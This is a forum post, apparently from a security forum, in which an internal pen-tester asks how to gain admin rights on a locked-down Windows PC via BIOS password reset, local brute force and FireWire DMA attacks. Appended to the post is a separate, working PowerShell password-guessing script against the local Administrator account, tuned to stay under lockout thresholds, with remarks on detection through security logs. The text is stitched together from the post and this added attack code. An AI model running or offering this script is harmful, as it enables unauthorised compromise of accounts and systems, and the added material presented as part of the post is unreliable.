Hi,

I'm pen-testing a different kind of environment; my pen-test is internal (more like an insider).

All I have is a PC from the company (without any tools, only Windows) connected to the local network.

My job is to (try to) escalate privileges on this machine and get into the servers on the network.

Up to here it all appears very easy, but there are some special points:

- The computer has a clean Windows installation (with a small number of third-party programs: just MS Office, an antivirus, and a program used internally, a kind of ERP).

- The Windows system is FULLY patched (WSUS).

- My user privileges are very low; I have basically no permissions on the computer.

- The computer also has strong Windows policies (I can't change the wallpaper, see configuration properties, etc.).

- The computer has its disk encrypted (a kind of TrueCrypt).

- The computer has a CD-ROM and USB ports, HOWEVER I'm unable to access them (some program (maybe an endpoint security product?) doesn't allow me to access them).

- The boot sequence doesn't allow booting from CD or USB.

- The BIOS boot is protected by passwords.

- All physical ports on the CPU are locked with a kind of "padlock" for computers.

- The PC does not have an internet connection.

- I cannot plug my own laptop into the network cable.

- There is no wireless network.


NOW..... What I thought of!

- Reset the BIOS password via Windows (W W W.cgsecurity.org/wiki/CmosPwd); however, it needs administrative privileges.

- By the way, booting BT from CD or USB is not possible.

- I thought of trying a local brute force against the administrator account; since it's local, maybe it can work. Maybe there is a kind of fast (multi-threaded) tool which allows brute-forcing Windows accounts locally (maybe via the "runas" feature)? Does anyone have any hint for me?

- I remember that some time ago a lot of people on the internet said that a "FireWire" device could be used to break into any Windows. A kind of "plug and root" via FireWire, where it could copy hash files or unlock the Administrator password. Is someone aware of a (link to a) detailed description of how to build one?

I found:

W W W.infopackets.com/news/hardware/2008/20080311_firewire_hack_also_works_with_windows_vista.htm

And even:

storm.net.nz/static/files/winlockpwn

The big question is, how to build one? What do I need? Do I really need an iPod? Can't it be something less expensive? Maybe my own computer? Is there a step-by-step somewhere?

Note: for all sites written with "W W W" you must remove the spaces; I type them this way because my forum account is not allowed to post URLs yet.

I have no more ideas.

Do you have any idea or hint for me? All suggestions are welcome.

Thanks
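The post above asks whether a local brute force against the Administrator account could be driven through "runas". The script below is an added example, not part of the original post and not a tool the poster mentions: it validates candidate passwords directly against the local SAM from an unprivileged session using the .NET PrincipalContext API (ContextType.Machine), which is the same logon check "runas" performs without spawning a process per attempt. It first reads the local lockout threshold with "net accounts" and stops short of it, because every failed attempt counts toward lockout and is written to the Security log as event 4625. The account name, the wordlist and the safety margin are constructed placeholders.

```powershell
# Added example (not from the original post). Requires only a standard user
# session on Windows PowerShell 5.1 or PowerShell 7 on Windows.
Add-Type -AssemblyName System.DirectoryServices.AccountManagement

function Get-LocalLockoutThreshold {
    # "net accounts" prints the effective local policy; "Never" means no lockout.
    $line = (net accounts) | Where-Object { $_ -match 'Lockout threshold' }
    if ($line -match 'Lockout threshold:\s*(\S+)') { return $Matches[1] }
    return $null
}

function Test-LocalCredential {
    param([string]$User, [string]$Password)
    # Validate against the local machine's SAM (ContextType.Machine). A wrong
    # password simply returns $false; a disabled or locked account also fails.
    $ctx = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext `
        -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Machine)
    try     { return $ctx.ValidateCredentials($User, $Password) }
    catch   { return $false }
    finally { $ctx.Dispose() }
}

function Invoke-LocalPasswordSpray {
    param(
        [string]$User,
        [string[]]$Wordlist,
        [int]$SafetyMargin = 2   # stay this many attempts below the lockout threshold
    )
    $threshold = Get-LocalLockoutThreshold
    $budget = if (-not $threshold -or $threshold -eq 'Never') { $Wordlist.Count }
              else { [int]$threshold - $SafetyMargin }
    if ($budget -le 0) {
        Write-Warning "Lockout threshold '$threshold' leaves no safe attempt budget."
        return $null
    }

    $tried = 0
    foreach ($candidate in $Wordlist) {
        if ($tried -ge $budget) {
            Write-Warning "Stopping after $tried attempts to stay under the lockout threshold."
            break
        }
        $tried++
        if (Test-LocalCredential -User $User -Password $candidate) { return $candidate }
    }
    return $null
}

# Constructed sample input: a tiny wordlist against the built-in local admin account.
$wordlist = @('Password1', 'Welcome1', 'Admin123', 'P@ssw0rd')
$hit = Invoke-LocalPasswordSpray -User 'Administrator' -Wordlist $wordlist
if ($hit) { "Valid password found: $hit" } else { "No hit in $($wordlist.Count) candidates" }
```

If the threshold is "Never" the loop is bounded only by the wordlist, so the real constraint on a hardened build like the one described is detection rather than lockout: a burst of 4625 events from one workstation against Administrator is exactly what a SIEM rule looks for, and a local antivirus or endpoint agent may also block or report the script itself.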